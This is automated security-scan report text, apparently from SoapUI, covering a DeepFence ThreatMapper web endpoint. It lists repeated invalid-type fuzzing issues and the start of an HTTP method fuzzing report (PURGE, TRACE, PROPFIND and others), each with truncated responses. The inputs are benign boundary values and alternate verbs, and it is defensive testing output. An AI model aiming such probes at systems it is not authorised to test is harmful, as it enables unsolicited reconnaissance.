#1978\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -32768\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1979Scan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 127\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1980\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1981\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1982\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# 1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1983\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1267896799\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1984\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 882223334991111111\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1985\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 294967295\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1986\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 65535\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1987\nScan Invalid Types\nSeverity ERROR\nhttps://deepfence.show/Endpoint\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 255\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1988\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# SoapUI is the best\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1989\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# SoapUI is the best\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1990" } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2021-04-16 11_43_17.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin 164.90.157.161-withUsernamePassword/Security Test Suite 1/https://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-16 11:43:17\nTime taken 00:05:57.491\nTotal scans performed: 2042\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PURGE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest COPY https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest UNLOCK https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest LOCK https://164.90.157.161/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PROPFIND https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PATCH https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest TRACE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest OPTIONS https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName 